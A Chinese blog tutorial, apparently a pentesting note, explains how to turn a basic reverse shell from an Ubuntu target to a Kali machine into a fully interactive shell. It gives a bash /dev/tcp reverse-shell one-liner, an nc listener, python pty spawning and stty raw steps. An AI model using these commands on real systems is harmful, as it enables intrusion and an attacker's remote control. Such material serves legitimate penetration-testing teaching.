反弹Shell升级为交互式Shel
前言
经常我们拿到的shell是一个简单的shell
如何把一个简单的shell就升级到一个标准交互式shell
写这篇文章记录一下
正文
攻击机:kali
靶机:ubuntu
普通Shell
给kali弹shell
bash -i >& /dev/tcp/192.168.145.128/4444 0>&1
kali:nc -lvvp 4444
然后发现这个shell有很多问题
无法使用vim等文本编辑器
不能补全
不能su
没有向上箭头使用历史
等等
半交互式Shell
对于已经安装了python的系统,我们可以使用python提供的pty模块,只需要一行脚本就可以创建一个原生的终端,命令如下:
python -c 'import pty; pty.spawn("/bin/bash")'
在创建完成后,我们此时就可以运行su命令了
但是还是存在很多问题
无法使用vim等文本编辑器
不能补全
没有向上箭头使用历史
完全交互式Shell
命令:
$ python -c 'import pty; pty.spawn("/bin/bash")'
Ctrl-Z
$ stty raw -echo
$ fg
$ reset
$ export SHELL=bash
//$ export TERM=xterm-256color
此时已经拥有了一个完全交互式Shell,就可以使用上下左右,vi,tab补全等等一系列操作,并且按Ctrl-c也不会退出。
相关命令解析
stty -echo #禁止回显,当在键盘上输入时,并不出现在屏幕上
stty echo #打开回显
stty raw #设置原始输入
stty -raw #关闭原始输入
bg 将一个在后台暂停的命令,变成继续执行
fg 将后台中的命令调至前台继续运行
jobs 查看当前有多少在后台运行的命令
ctrl + z
可以将一个正在前台执行的命令放到后台,并且暂停
clear
这个命令将会刷新屏幕,本质上只是让终端显示页向后翻了一页,如果向上滚动屏幕还可以看到之前的操作信息。
reset
这个命令将完全刷新终端屏幕,之前的终端输入操作信息将都会被清空
反弹Shell升级为交互式Shel相关推荐
- mysql 反弹shell_反弹shell升级成交互式shell
实验环境: A : kali 虚拟机 B: centos7.5 虚拟机 1. A 机 kali 虚拟机 设置监听 端口 root@kali64:~# nc -lvvp 9001 # 端口随便定义,没被 ...
- 提权(概述、水平/垂直越权、windows/linux提权、反弹shell、Linux_Exploit_Suggester、searchsploit)
文章目录 提权 一.概述 二.水平越权&垂直越权 三.分类 - windows 1. 基于windows2003 2. 基于windows2008 3. ms SQL提权 5. nc反弹she ...
- linux 反弹shell(二)反弹shell的本质
0X00 前言 在上一篇文章 Linux反弹shell(一)文件描述符与重定向,我们已经讨论过了反弹shell中最核心也是相对较难理解的部分,那么接下来我们就可以正式借反弹shell的实例分析回顾前一 ...
- 一句话反弹shell
1.bash反弹 攻击机监听端口 netcat: nc -nvlp 4444 -n: 不反向解析dns,即不通过ip解析域名 no dns -v: 详细信息输出 verbose -l: 监听 ...
- centos7输入shell找不到命令_反弹shell原理与实现
什么是反弹shell? 反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端.reverse shell与tel ...
- linux 下ssh端口反弹,利用ssh隧道反弹shell
说明 本文旨在分析rssh的源代码来学习利用ssh隧道来反弹shell.整个rssh只有1个347行的main文件,所以整体的逻辑结构也比较好分析.关于SSH端口转发的知识可以看实战SSH端口转发这篇 ...
- shell不允许输入空字符_反弹shell | ncamp;bash
01 nc netcat,简称nc,一款TCP/UDP网络连接的利器,可实现任意TCP/UDP端口的侦听,被称为"瑞士军刀",可见其功能强大. nc的选项较多,这里只介绍我们日常工 ...
- linux 反弹 socket,反弹shell基础
1. 从Bash一句话shell讲起 bash -i >& /dev/tcp/172.168.1.1/80 0>&1 将这句话拆开来看,bash -i,>&, ...
- ac2100 反弹shell无法粘贴_【1029精简稳定版OpenWrt】红米&小米AC2100|帕斯沃|多拨|SmartD...
[1029精简稳定版OpenWrt]红米&小米AC2100|帕斯沃|多拨|SmartDNS|IPV6,附刷机教程 [0812精简版更新]: 1.同步最新0720源码.内核以及插件. 2.更换一 ...
最新文章
- (转载)android如何在style文件中使用自定义属性
- 高等数学、线性代数、概率论数理统计书籍推荐
- shell__常用命令__awk
- docker 的mysql镜像使用手册 官网原文 日期2017-05-25
- VTK:Utilities之ZBuffer
- 嘉年华回顾丨PingCAP CEO 刘奇,带你探寻TiDB...
- 安装sql时挂起的解决方法
- css网页favicon_自用代码css获取任意网址的/favicon.ico的方法教程
- word 中快速加入序号等符号
- win10 串口驱动下载链接
- 微软.Net离线语音识别
- 《云计算安全体系》之虚拟化安全读后总结
- 读写锁就是恶霸和良民一起桑拿
- 推荐系统之从石器时代到青铜时代的演进史
- Cocoa与Cocoa Touch区别
- Kindle刷安卓双系统的方法_我是亲民_新浪博客
- android 7.0原生room,小米5S 安卓9.0 原生体验 LineageOS16.0 ROOT
- 最长匹配括号子序列问题
- Android高仿苹果计算器
- Android Qcom USB Driver学习(六)
热门文章
- 红旗Linux操作系统下载(转)
- 中职学生计算机应用专业升大要什么证书,中职计算机应用专业校级全员化技能竞赛初探...
- Redis的渐进式Rehash
- 泛函分析 03.06 内积空间与Hilbert空间 - 习题课
- html5语义化规范,html5语义化标签使用规范
- 【QT】QT 按钮保持按下时的样式
- Java程序员的JavaScript学习笔记(13—— jQuery UI)
- 面向对象之多态(学习java第十天)
- 网络DHCP配置简单介绍
- input输入search查找关键词时,实现(即时搜索)边输入边输出目标内容的例子代码